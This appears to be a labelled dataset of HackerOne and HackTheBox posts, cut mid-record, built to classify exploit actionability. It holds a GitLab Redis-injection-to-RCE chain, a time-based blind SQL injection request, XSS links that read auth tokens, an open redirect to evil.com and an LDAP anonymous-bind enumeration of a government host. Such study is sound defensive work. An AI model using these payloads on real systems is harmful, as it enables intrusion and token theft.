b/src/env.cc\n@@ -791,6 +791,11 @@ Environment::Environment(IsolateData* isolate_data,\n // spawn/worker nor use addons unless explicitly allowed by the user\n if (!options_->allow_fs_read.empty() || !options_->allow_fs_write.empty()) {\n options_->allow_native_addons = false;\n+ DebugOptions debug_options;\n+ debug_options = options_->debug_options();\n+ if (!debug_options.inspector_enabled || !debug_options.break_first_line) {\n+ flags_ = flags_ | EnvironmentFlags::kNoCreateInspector;\n+ }\n if (!options_->allow_child_process) {\n permission()->Apply(\"*\", permission::PermissionScope::kChildProcess);\n }\n```\n\n## Impact\n\nPermission Model is a mechanism for restricting access to specific resources during execution. This bypasses those ", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6b0b5cfc86420d785891", "text": "[Command Injection - Generic] Remote Command Execution via Github import\n\n### Summary\n\nThis is very similar to https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/#Remote%20Command%20Execution%20via%20Github%20import and allows arbitrary redis commands to be injected when imported a GitHub repository.\n\nWhen importing a GitHub repo the api client uses `Sawyer` for handling the responses. This takes a json hash and converts it into a ruby class that has methods matching all of the keys:\n\nhttps://github.com/lostisland/sawyer/blob/v0.9.2/lib/sawyer/resource.rb#L106-L110\n```ruby\n def self.attr_accessor(*attrs)\n attrs.each do |attribute|\n class_eval do\n define_method attribute do\n @attrs[attribute.to_sym]\n end\n\n define_method \"#{attribute}=\" do |value|\n @attrs[attribute.to_sym] = value\n end\n\n define_method \"#{attribute}?\" do\n !!@attrs[attribute.to_sym]\n end\n end\n end\n end\n```\n\nThis happens recursively, and allows for any method to be overridden including built-in methods such as `to_s`.\n\nThe redis gem uses `to_s` and `bytesize` to generate the RESP command, so if a `Sawyer::Resource` is ever passed in that has a controllable hash it can allow arbitrary redis commands to be injected into the stream as the string will be shorter than the `$` size provided (see https://redis.io/docs/reference/protocol-spec/)\n\nhttps://github.com/redis/redis-rb/blob/v4.4.0/lib/redis/connection/command_helper.rb#L20\n```ruby\n i = i.to_s\n command << \"$#{i.bytesize}\"\n command << i\n```\n\nThe patch for CVE-2022-2884 added validation to `Gitlab::Cache::Import::Caching` but there is another spot where the `Sawyer::Resource` is passed to redis:\n\nhttps://gitlab.com/gitlab-org/gitlab/-/blob/v15.3.1-ee/lib/gitlab/github_import/importer/repository_importer.rb#L55\n```ruby\n def import_repository\n project.ensure_repository\n\n refmap = Gitlab::GithubImport.refmap\n project.repository.fetch_as_mirror(project.import_url, refmap: refmap, forced: true)\n\n project.change_head(default_branch) if default_branch\n\n # The initial fetch can bring in lots of loose refs and objects.\n # Running a `git gc` will make importing pull requests faster.\n Repositories::HousekeepingService.new(project, :gc).execute\n\n true\n end\n```\n\nThe `default_branch` param comes from the client repository (which is a nested Sawyer::Resource of attacker controlled data), and is passed to `change_head` which then calls `branch_exists?` and `branch_names_include?` which passes the value to redis:\n\nhttps://gitlab.com/gitlab-org/gitlab/-/blob/v15.3.1-ee/lib/gitlab/repository_cache_adapter.rb#L71\n```ruby\n define_method(\"#{name}_include?\") do |value|\n ivar = \"@#{name}_include\"\n memoized = instance_variable_get(ivar) || {}\n lookup = proc { __send__(name).include?(value) } # rubocop:disable GitlabSecurity/PublicSend\n\n next memoized[value] if memoized.key?(value)\n\n memoized[value] =\n if strong_memoized?(name)\n lookup.call\n else\n result, exists = redis_set_cache.try_include?(name, value)\n\n exists ? result : lookup.call\n end\n\n instance_variable_set(ivar, memoized)[value]\n end\n```\n\nSo by returning an api response with a `default_branch` that overrides `to_s` and `bytesize` you can call arbitrary redis commands:\n\n```json\n {\n \"default_branch\": {\n \"to_s\": {\n \"to_s\": 'ggg\\r\\nINJECT_RESP_HERE',\n \"bytesize\": 3,\n }\n }\n }\n```\n\nThis can be combined with a call to `Marshal.load` when loading a _gitlab_session to execute a deserialisation gadget (such as https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html) and gain RCE.\n\n### Steps to reproduce\n\n1. edit {F1882976} and change the comm", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-2884"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "feb789bb4fa5c4068bb5", "text": "[Information Disclosure] LDAP Anonymous Login enabled in ████\n\n**Description:**\nThe host ██████████ has anonymous LDAP login enabled, which means that anyone can connect to the LDAP server without providing any authentication credentials. This allows unauthorized users to perform LDAP queries, potentially retrieving sensitive information such as user details, organizational data, or other critical information stored in the LDAP directory.\n\n## References\nhttps://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap\n\n## Impact\n\nAttackers can exploit this vulnerability to gain unauthorized access to the LDAP server and retrieve sensitive information stored within the directory. Attackers can use the gathered information to perform further attacks, including privilege escalation, or targeted attacks against the system or its users.\n\n## System Host(s)\n████\n\n## Affected Product(s) and Version(s)\nLADP\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n## Proof Hosts Belong to DoD\n\n██████\n\n1. First install ldap3 using pip3 and run the following command.\n\n```\nPython 3.9.2 (default, Feb 28 2021, 17:03:44) \n[GCC 10.2.1 20210110] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import ldap3==\n>>> server = ldap3.Server('██████████', get_info = ldap3.ALL, port =636, use_ssl = True)\n>>> connection = ldap3.Connection(server)\n>>> connection.bind()\nTrue\n>>> server.info\nDSA info (from DSE):\n Supported LDAP versions: 2, 3\n Naming contexts: \n dc=satx,dc=disa,dc=mil\n uid=Monitor\n cn=iasdsadmin\n Supported controls: \n 1.2.826.0.1.3344810.2.3 - Matched Values - Control - RFC3876\n 1.2.840.113556.1.4.1413 - Permissive modify - Control - MICROSOFT\n 1.2.840.113556.1.4.319 - LDAP Simple Paged Results - Control - RFC2696\n 1.2.840.113556.1.4.473 - Sort Request - Control - RFC2891\n 1.2.840.113556.1.4.805 - Tree delete - Control - MICROSOFT\n 1.3.6.1.1.12 - Assertion - Control - RFC4528\n 1.3.6.1.1.13.1 - LDAP Pre-read - Control - RFC4527\n 1.3.6.1.1.13.2 - LDAP Post-read - Control - RFC4527\n 1.3.6.1.4.1.26027.1.5.2 - Replication repair - Control - OpenDS\n 1.3.6.1.4.1.26027.1.5.4\n 1.3.6.1.4.1.36733.2.1.5.1\n 1.3.6.1.4.1.36733.2.1.5.5\n 1.3.6.1.4.1.42.2.27.8.5.1 - Password policy - Control - IETF DRAFT behera-ldap-password-policy\n 1.3.6.1.4.1.42.2.27.9.5.2 - Get effective rights - Control - IETF DRAFT draft-ietf-ldapext-acl-model\n 1.3.6.1.4.1.42.2.27.9.5.8 - Account usability - Control - SUN microsystems\n 1.3.6.1.4.1.4203.1.10.1 - Subentries - Control - RFC3672\n 1.3.6.1.4.1.4203.1.10.2 - No-Operation - Control - IETF DRAFT draft-zeilenga-ldap-noop\n 1.3.6.1.4.1.4203.666.5.12\n 1.3.6.1.4.1.7628.5.101.1 - LDAP subentries - Control - IETF DRAFT draft-ietf-ldup-subentry\n 2.16.840.1.113730.3.4.12 - Proxied Authorization (old) - Control - Netscape\n 2.16.840.1.113730.3.4.16 - Authorization Identity Request Control - Control - RFC3829\n 2.16.840.1.113730.3.4.17 - Real attribute only request - Control - Netscape\n 2.16.840.1.113730.3.4.18 - Proxy Authorization Control - Control - RFC6171\n 2.16.840.1.113730.3.4.19 - Chaining loop detection - Control - Netscape\n 2.16.840.1.113730.3.4.2 - ManageDsaIT - Control - RFC3296\n 2.16.840.1.113730.3.4.3 - Persistent Search - Control - IETF\n 2.16.840.1.113730.3.4.4 - Netscape Password Expired - Control - Netscape\n 2.16.840.1.113730.3.4.5 - Netscape Password Expiring - Control - Netscape\n 2.16.840.1.113730.3.4.9 - Virtual List View Request - Control - IETF\n Supported extensions: \n 1.3.6.1.1.8 - Cancel Operation - Extension - RFC3909\n 1.3.6.1.4.1.1466.20037 - StartTLS - Extension - RFC4511-RFC4513\n 1.3.6.1.4.1.26027.1.6.1 - Password policy state - Control - OpenDS\n 1.3.6.1.4.1.26027.1.6.2 - Get connection ID - Control - OpenDS\n 1.3.6.1.4.1.26027.1.6.3 - Get symmetric key - Control - OpenDS\n 1.3.6.1.4.1.4203.1.11.1 - Modify Password - Extension - RFC3062\n 1.3.6.1.4.1.4203.1.11.3 - Who am I - Extension - RFC4532\n Supported features: \n 1.3.6.1.1.14 - Modify-Increment - Feature - RFC45", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a7e2ccfebc0a870f3f1e", "text": "[Business Logic Errors] objectId in share location can be set to open arbitrary URL or Deeplinks\n\n## Summary:\nThe NextCloud Talk app allows a user to share their location in the Mobile App.\nThe objectId= in ```/ocs/v2.php/apps/spreed/api/v1/chat/$token/share``` Can be set to a URL or Deeplink, While the ```metaData=``` will render the map, Once a user clicked the map it will open the defined URL or Deeplink in the crafted request.\n\nFor days, I've been thinking and trying different ways to Increase its Severity but i guess im stuck so here i am Reporting this.\n\n\n\n\n## Steps To Reproduce:\nNote: Location Sharing is only allowed in the Mobile App.\n\n* 1.) Using the app share your location and Intercept it, The request should be similar to the ```Request``` Below.\n* 2.) Alter the ```objectId=``` to whatever URL you want to point it at.\n* 3.) Send the Request\n* 4.) Using the Mobile app, Click the map and it will redirect you to the url.\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n### Request\n\n ```\nPOST /ocs/v2.php/apps/spreed/api/v1/chat/wqfqmw9n/share HTTP/2\nHost: localhost\nCookie: oc_sessionPassphrase=cookie; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; occi3pyo3vg0=6lheeis7ot8kcnvdgq12ijl90e\nAuthorization: Basic \nUser-Agent: Mozilla/5.0 (Android) Nextcloud-Talk v12.2.1\nAccept: application/json\nOcs-Apirequest: true\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 227\nAccept-Encoding: gzip, deflate\n\nobjectType=geo-location&objectId=https://ctulhu.me&referenceId=kkk&metaData={\"type\":\"geo-location\",\"id\":\"geo:14.600765443470294,121.00452968052457\",\"latitude\":\"14.600765443470294\",\"longitude\":\"121.00452968052457\",\"name\":\"hehe\"}\n```\n\n### Response\n\n```\nHTTP/2 201 Created\nDate: Sat, 11 Sep 2021 17:30:22 GMT\nContent-Type: application/json; charset=utf-8\nContent-Length: 509\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\n\n\n{\"ocs\":{\"meta\":{\"status\":\"ok\",\"statuscode\":201,\"message\":\"OK\"},\"data\":{\"id\":237,\"token\":\"wqfqmw9n\",\"actorType\":\"users\",\"actorId\":\"secret\",\"actorDisplayName\":\"secret\",\"timestamp\":1631381422,\"message\":\"{object}\",\"messageParameters\":{\"actor\":{\"type\":\"user\",\"id\":\"secret\",\"name\":\"secret\"},\"object\":{\"type\":\"geo-location\",\"id\":\"https:\\/\\/ctulhu.me\",\"latitude\":\"14.600765443470294\",\"longitude\":\"121.00452968052457\",\"name\":\"hehe\"}},\"systemMessage\":\"\",\"messageType\":\"comment\",\"isReplyable\":true,\"referenceId\":\"kkk\"}}}\n\n```\n\n## Impact\n\nA attacker can abuse this to fool the user to open a malicious url or 3rd party app.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bd3d12f0e2925d26f7c8", "text": "[Cross-site Scripting (XSS) - Generic] XSS at jamfpro.shopifycloud.com\n\n*Description*\nThere is Jamf Pro running at https://jamfpro.shopifycloud.com/ which has old Swagger-UI exposed at /classicapi/doc/. I think it's possible to take over the Jamf Pro account of the user that clicks the link. (more about that below) \n\n*Steps to reproduce*\n\n**POC with simple alert box**:\n1. Open `https://jamfpro.shopifycloud.com/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==`\n2. You should see an alert box (F1573391)\n\n**POC rendering phishing page**:\n1. Click the link: `https://jamfpro.shopifycloud.com/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjogImh0dHBzOi8vdGVhcmZ1bC1lYXJ0aC5zdXJnZS5zaC90ZXN0LnlhbWwiLAp9`\n2. You should see a phishing page rendered (F1573392)\n\n**POC of stealing auth token**:\nJamf Pro stores authentication token in localstorage under `authToken` key when you authenticate using login and password, so my assumption is that it will do the same for Saml authentication. (you will have to test that) If it's true then taking over the user's account who clicked the link would be trivial. The POC below will print `authToken` from localstorage.\n\n1. Authenticate to `jamfpro.shopifycloud.com` and click the link: `https://jamfpro.shopifycloud.com/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==`\n2. You should see an alert box with auth token. \n\n## Impact\n\nAn attacker can execute arbitrary JS code in the context of https://jamfpro.shopifycloud.com/ - it means he can do whatever authenticated user at https://jamfpro.shopifycloud.com/ could do.\n\n## Impact\n\nAn attacker can execute arbitrary JS code in the context of https://jamfpro.shopifycloud.com/ - it means he can do whatever authenticated user at https://jamfpro.shopifycloud.com/ could do.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "98e3fdebbd0bf0bb0fe0", "text": "[Unknown] [Python]: Timing attack\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "df1beeb0f1f882582d89", "text": "[Unknown] CVE-2021-38314 @ https://www.mtn.ci\n\n## Summary:\nHello.\nI your domain https://www.mtn.ci was vulnerable to CVE-2021-38314\n\n##Description:\nThe Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`.\n\n##Referrence:\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314\nhttps://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/\n\n## Steps To Reproduce:\nVisit https://www.mtn.ci/wp-admin/admin-ajax.php?action=e1efc9f8463379b3427645c8df923e6d you will see ```037c4f460684e77a5f67fe148576121b```\n\n## Supporting Material/References:\n{F1461730}\n\n## Impact\n\nCVE-2021-38314", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2021-38314"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d5bcbbd852ffa6494418", "text": "Just so its 100% clear: The question regarding the name of the image file (w/ hint: file.jpg) utilizes the Wireshark-Lab-2.pcap file. The question regarding the name of the user who is acting maliciously utilizes the packet capture data from the target device you spawn and then rdp into the capture VM. Do not mix them up, and be aware that these two questions use different resources for their answer.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-09-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b09ae7271ed04d2e299f", "text": "[Open Redirect] Attachment references in markdown don't warn before downloading\n\n**Summary:**\nBy default if any link of report is clicked, There will be a popup to user \nthat you're visiting a third-party website please proceed at your own risk etc. \nHowever, when a user views the report all links are non clickable and file URI is appended. \nI have Found out that I can bypass this functionality by appending a \" and ) in the end . \nFor example if you view this link as PDF and click the link it will simply redirect you to the URL. \n\nthere will be a popup, That you are visited a third party domain etc.\n**Description:**\n\n### Steps To Reproduce\n\n1. create a H1 report with the following payload \n\n(https://example.com\") \n\n2. view the report click export and view as pdf\n3. hover the link and click . \n4. observe that you are directly redirected without any warning of going to third party domain. \n\n### Optional: Your Environment (Browser version, Device, etc)\n\n * \n\n### Optional: Supporting Material/References (Screenshots)\n\n *\n\n## Impact\n\nBy using this vulnerability an attacker might be able to get a victims IP address , make them login etc.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "fb3f33f4a214a49b03e9", "text": "[SQL Injection] SQL injextion via vulnerable doctrine/dbal version\n\n## Summary:\nSQL injection via limit parameter on user facing APIs\n\n## Steps To Reproduce:\nRun security scanner:\n\n 1. REPORT /remote.php/dav/comments/files/1985\n 1. XML input oc:filter-comments.oc:limit#text was set to 1'\"\n 1. You have an error in your SQL syntax\n\n## Supporting Material/References:\nFor more details see:\nhttps://github.com/nextcloud-gmbh/h1/issues/197\n\n## Impact\n\nFull flexed SQL injection via user provided input", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ca8e7e01f5d92f4b156b", "text": "Hi MunAsqah, I have spent a week on this. could you please help me with the last question about DNS lab. thanks", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-02-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b1e42434c1378604a68c", "text": "[Cross-site Scripting (XSS) - Stored] Stored XSS in plan name field (Acronis Cyber Protect)\n\n## Summary\nIt has been identified that a known and previously reported stored XSS vulnerability is still possible to be exploited and abused in the recent version of Acronis Cyber Protect (*15.0.31791*), released last March 7, 2023, (*evidence attached*).\nThis report is for no other purpose than to make it known that the vulnerability still persists.\n\n## Steps To Reproduce\nBe sure to follow the steps below to replicate this vulnerability:\n\n 1. Create a new plan. Add a valid device.\n 1. As plan name type the following payload: ``\n 1. Save the changes and wait for the plan to be created.\n 1. Now stop the plan by pressing the \"Stop\" button.\n 1. Before stopping it will ask for confirmation. Press the red \"Confirm\" button and the vulnerability will be triggered immediately.\n\nNote that just below the browser window a bubble will appear with a temporary message trying to render our payload.\n\n## Recommendations\nYou can avoid such vulnerabilities by escaping, validating data entries in fields and sanitizing suspicious and/or malicious entries. This text field is not supposed to contain/accept special characters or payloads.\n\n## Impact\n\nAn XSS attack allows an attacker to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, perform requests in the name of the victim or for phishing attacks.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "39ff29059e406a855f5c", "text": "[SQL Injection] SQL Injection in version 1.4.3 and below\n\n## Summary:\nSQL Injection in ImpressCMS v1.4.3 and earlier allows remote attackers to inject into the code in unintended way, this allows an attacker to read and modify the sensitive information from the database used by the application. If misconfigured, an attacker can even upload a malicious web shell to compromise the entire system.\n\n## ImpressCMS branch :\n[1.4]\n## Browsers Verified In:\n\n Google Chrome, Firefox]\n\n## Steps To Reproduce:\nStep1- Login with Admin Credentials\nStep2- Vulnerable Parameter to SQLi: mimetypeid (POST request):\n\nPOST /ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 HTTP/1.1\nHost: 192.168.56.117\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---------------------------40629177308912268471540748701\nContent-Length: 1011\nOrigin: http://192.168.56.117\nConnection: close\nReferer: http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1\nCookie: tbl_SystemMimetype_sortsel=mimetypeid; tbl_limitsel=15; tbl_SystemMimetype_filtersel=default; ICMSSESSION=7c9f7a65572d2aa40f66a0d468bb20e3\nUpgrade-Insecure-Requests: 1\n\n-----------------------------40629177308912268471540748701\nContent-Disposition: form-data; name=\"mimetypeid\"\n\n1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE)\n-----------------------------40629177308912268471540748701\nContent-Disposition: form-data; name=\"extension\"\n\nbin\n-----------------------------40629177308912268471540748701\nContent-Disposition: form-data; name=\"types\"\n\napplication/octet-stream\n-----------------------------40629177308912268471540748701\nContent-Disposition: form-data; name=\"name\"\n\nBinary File/Linux Executable\n-----------------------------40629177308912268471540748701\nContent-Disposition: form-data; name=\"icms_page_before_form\"\n\nhttp://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype\n-----------------------------40629177308912268471540748701\nContent-Disposition: form-data; name=\"op\"\n\naddmimetype\n-----------------------------40629177308912268471540748701\nContent-Disposition: form-data; name=\"modify_button\"\n\nSubmit\n-----------------------------40629177308912268471540748701--\n\nVulnerable Payload:\n1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE) //time-based blind (query SLEEP)\n\nOutput:\nweb application technology: Apache 2.4.52, PHP 7.4.27\nback-end DBMS: MySQL >= 5.0.12 (MariaDB fork)\navailable databases [6]:\n[*] impresscms\n[*] information_schema\n[*] mysql\n[*] performance_schema\n[*] phpmyadmin\n[*] test\n\n## Suggestions to mitigate or resolve the issue:\nUse Parameterized Queries\n\n## Supporting Material/References:\nhttps://github.com/sartlabs/0days/blob/main/ImpressCMS1.4.3/Exploit.txt\n\n * [attachment / reference]\n\n## Impact\n\nSQL Injection in ImpressCMS v1.4.3 and earlier allows remote attackers to inject into the code in unintended way, this allows an attacker to read and modify the sensitive information from the database used by the application. If misconfigured, an attacker can even upload a malicious web shell to compromise the entire system.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "64ce0f2a8dc811bd3767", "text": "[Open Redirect] [https://█████████/]&&[https://█████████/] Open Redirection\n\n***Summary***\n\nHi Team,\n\nAn attacker can redirect vicitm on an external website using ``https://████/account/login`` endpoint because ``next`` parameter is not being validated properly.\n\n***Affected URL***\n\n`https://███/account/login/?next=///////////////////////////evil.com`\n\n***Steps to Reproduce***\n\n1) Go https://████/account/login/?next=%2Fapp%2F .\n2) Add this payload `////////////////////////////evil.com` to the `?next=` parameter .\n3) Registeran account in the normal way .\n4) You will be redirected to evil.com website .\n\n***POC***\n{F467696}\n\n***References***\n\n* https://hackerone.com/reports/347645\n* https://hackerone.com/reports/125003\n* https://hackerone.com/reports/411723\n\n## Impact\n\n* Open redirects allow a malicious attacker to redirect people unknowingly to a malicious\nwebsite .\n* Simplifies phishing attacks .", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "28bcfea41eafe31e379c", "text": "[Unknown] HTML injection at Company Name or Product Name and can be shown on Contact Sales form\n\nThere is a stored Cross-Site Scripting (XSS) vulnerability in the LinkedIn Lead Gen Form, specifically in the Company Name and Product Name fields. The vulnerability allows attackers to inject specific HTML elements, enabling them to change the appearance of a page, which can lead to Phishing attacks via the `` tag or Malware download links via the `` tag. The affected HTML elements include ``, ``, `` (only if it is a HTTPS link), `